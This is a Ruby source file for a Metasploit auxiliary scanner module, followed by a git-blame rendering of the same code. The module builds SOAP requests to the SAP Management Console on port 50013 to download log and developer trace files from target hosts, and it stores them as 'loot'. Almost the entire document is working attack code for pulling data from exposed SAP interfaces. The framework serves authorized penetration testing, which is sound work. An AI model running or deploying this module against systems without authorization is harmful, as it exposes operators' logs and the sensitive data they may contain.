metasploit-framework/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::Report
	include Msf::Auxiliary::Scanner

	def initialize
		super(
			'Name'         => 'SAP Management Console Get Logfile',
			'Version'      => '$Revision$',
			'Description'  => %q{ This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP Interface. Please use the sap_manamgenet_console_listlogfiles extension to view a list of availble files. },
			'References'   =>
				[
					# General
					[ 'URL', 'http://blog.c22.cc' ]
				],
			'Author'       => [ 'Chris John Riley' ],
			'License'      => MSF_LICENSE
		)

		register_options(
			[
				Opt::RPORT(50013),
				OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
				OptString.new('RFILE', [ true, 'The name of the file to download', 'sapstart.log']),
				OptString.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE']),
				OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request",
				'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
			], self.class)
		register_autofilter_ports([ 50013 ])
		deregister_options('RHOST')
	end

	def rport
		datastore['RPORT']
	end

	def run_host(ip)
		res = send_request_cgi({
			'uri'      => "/#{datastore['URI']}",
			'method'   => 'GET',
			'headers'  =>
				{
					'User-Agent' => datastore['UserAgent']
				}
		}, 25)
		return if not res

		gettfiles(ip)
	end

	def gettfiles(rhost)
		verbose = datastore['VERBOSE']
		print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
		success = false

		soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
		xsi = 'http://www.w3.org/2001/XMLSchema-instance'
		xs = 'http://www.w3.org/2001/XMLSchema'
		sapsess = 'http://www.sap.com/webas/630/soap/features/session/'

		case "#{datastore['FILETYPE']}"
		when /^LOG/i
			ns1 = 'ns1:ReadLogFile'
		when /^TRACE/i
			ns1 = 'ns1:ReadDeveloperTrace'
		end

		data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
		data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '"  xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"
		data << '<SOAP-ENV:Header>' + "\r\n"
		data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
		data << '<enableSession>true</enableSession>' + "\r\n"
		data << '</sapsess:Session>' + "\r\n"
		data << '</SOAP-ENV:Header>' + "\r\n"
		data << '<SOAP-ENV:Body>' + "\r\n"
		data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + "#{datastore['RFILE']}" + '</filename></' + ns1 + '>' + "\r\n"
		data << '</SOAP-ENV:Body>' + "\r\n"
		data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
	
		begin
			res = send_request_raw({
				'uri'      => "/#{datastore['URI']}",
				'method'   => 'POST',
				'data'     => data,
				'headers'  =>
					{
						'Content-Length' => data.length,
						'SOAPAction'     => '""',
						'Content-Type'   => 'text/xml; charset=UTF-8',
					}
			}, 120)

			env = []

			if res.code == 200
				case res.body
				when nil
					# Nothing
				when /<item>([^<]+)<\/item>/i
					body = []
					body = res.body
					env = body.scan(/<item>([^<]+)<\/item>/i)
					success = true
				end

				case res.body
				when nil
					# Nothing
				when /<name>([^<]+)<\/name>/i
					name = $1.strip
					success = true
				end

			elsif res.code == 500
				case res.body
				when /<faultstring>(.*)<\/faultstring>/i
					faultcode = $1.strip
					fault = true
				end
			end

		rescue ::Rex::ConnectionError
			print_error("#{rhost}:#{rport} [SAP] Unable to connect")
			return
		end

		if success
			print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}:#{datastore['RFILE'].downcase} looted")
			store_loot("sap.#{datastore['FILETYPE'].downcase}file", "text/xml", rhost, res.body, "sap_#{datastore['RFILE'].downcase}.xml",
			 	"SAP Get Logfile")
		elsif fault
			print_error("#{rhost}:#{rport} [SAP] Errorcode: #{faultcode}")
			return
		else
			print_error("#{rhost}:#{rport} [SAP] failed to request environment")
			return
		end
	end
end
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`

			`def initialize`
			`super(`
			`'Name' => 'SAP Management Console Get Logfile',`
			`'Version' => '$Revision$',`
			`'Description' => %q{ This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP Interface. Please use the sap_manamgenet_console_listlogfiles extension to view a list of availble files. },`
			`'References' =>`
			`[`
			`# General`
			`[ 'URL', 'http://blog.c22.cc' ]`
			`],`
			`'Author' => [ 'Chris John Riley' ],`
			`'License' => MSF_LICENSE`
			`)`

			`register_options(`
			`[`
			`Opt::RPORT(50013),`
			`OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`OptString.new('RFILE', [ true, 'The name of the file to download', 'sapstart.log']),`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`OptString.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE']),`
			`OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request",`
			`'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),`
			`], self.class)`
			`register_autofilter_ports([ 50013 ])`
			`deregister_options('RHOST')`
			`end`

			`def rport`
			`datastore['RPORT']`
			`end`

			`def run_host(ip)`
			`res = send_request_cgi({`
			`'uri' => "/#{datastore['URI']}",`
			`'method' => 'GET',`
			`'headers' =>`
			`{`
			`'User-Agent' => datastore['UserAgent']`
			`}`
			`}, 25)`
			`return if not res`

			`gettfiles(ip)`
			`end`

			`def gettfiles(rhost)`
			`verbose = datastore['VERBOSE']`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`success = false`

			`soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'`
			`xsi = 'http://www.w3.org/2001/XMLSchema-instance'`
			`xs = 'http://www.w3.org/2001/XMLSchema'`
			`sapsess = 'http://www.sap.com/webas/630/soap/features/session/'`

			`case "#{datastore['FILETYPE']}"`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`when /^LOG/i`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`ns1 = 'ns1:ReadLogFile'`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`when /^TRACE/i`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`ns1 = 'ns1:ReadDeveloperTrace'`
			`end`

			`data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"`
			`data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"`
			`data << '<SOAP-ENV:Header>' + "\r\n"`
			`data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"`
			`data << '<enableSession>true</enableSession>' + "\r\n"`
			`data << '</sapsess:Session>' + "\r\n"`
			`data << '</SOAP-ENV:Header>' + "\r\n"`
			`data << '<SOAP-ENV:Body>' + "\r\n"`
			`data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + "#{datastore['RFILE']}" + '</filename></' + ns1 + '>' + "\r\n"`
			`data << '</SOAP-ENV:Body>' + "\r\n"`
			`data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"`

			`begin`
			`res = send_request_raw({`
			`'uri' => "/#{datastore['URI']}",`
			`'method' => 'POST',`
			`'data' => data,`
			`'headers' =>`
			`{`
			`'Content-Length' => data.length,`
			`'SOAPAction' => '""',`
			`'Content-Type' => 'text/xml; charset=UTF-8',`
			`}`
			`}, 120)`

			`env = []`

			`if res.code == 200`
			`case res.body`
			`when nil`
			`# Nothing`
			`when /<item>([^<]+)<\/item>/i`
			`body = []`
			`body = res.body`
			`env = body.scan(/<item>([^<]+)<\/item>/i)`
			`success = true`
			`end`

			`case res.body`
			`when nil`
			`# Nothing`
			`when /<name>([^<]+)<\/name>/i`
Fixes more style and API usage issues git-svn-id: file:///home/svn/framework3/trunk@11863 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 18:46:00 +00:00			`name = $1.strip`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`success = true`
			`end`

Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`elsif res.code == 500`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`case res.body`
			`when /<faultstring>(.*)<\/faultstring>/i`
Fixes more style and API usage issues git-svn-id: file:///home/svn/framework3/trunk@11863 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 18:46:00 +00:00			`faultcode = $1.strip`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`fault = true`
			`end`
			`end`

			`rescue ::Rex::ConnectionError`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`print_error("#{rhost}:#{rport} [SAP] Unable to connect")`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`return`
			`end`

			`if success`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}:#{datastore['RFILE'].downcase} looted")`
Fixes more style and API usage issues git-svn-id: file:///home/svn/framework3/trunk@11863 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 18:46:00 +00:00			`store_loot("sap.#{datastore['FILETYPE'].downcase}file", "text/xml", rhost, res.body, "sap_#{datastore['RFILE'].downcase}.xml",`
			`"SAP Get Logfile")`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`elsif fault`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`print_error("#{rhost}:#{rport} [SAP] Errorcode: #{faultcode}")`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`return`
			`else`
Added patches from Chris John Riley for SAP aux scanner modules git-svn-id: file:///home/svn/framework3/trunk@11933 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-11 16:50:18 +00:00			`print_error("#{rhost}:#{rport} [SAP] failed to request environment")`
Added SAP Management Console auxiliary scanner modules git-svn-id: file:///home/svn/framework3/trunk@11858 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-02 10:18:31 +00:00			`return`
			`end`
			`end`
			`end`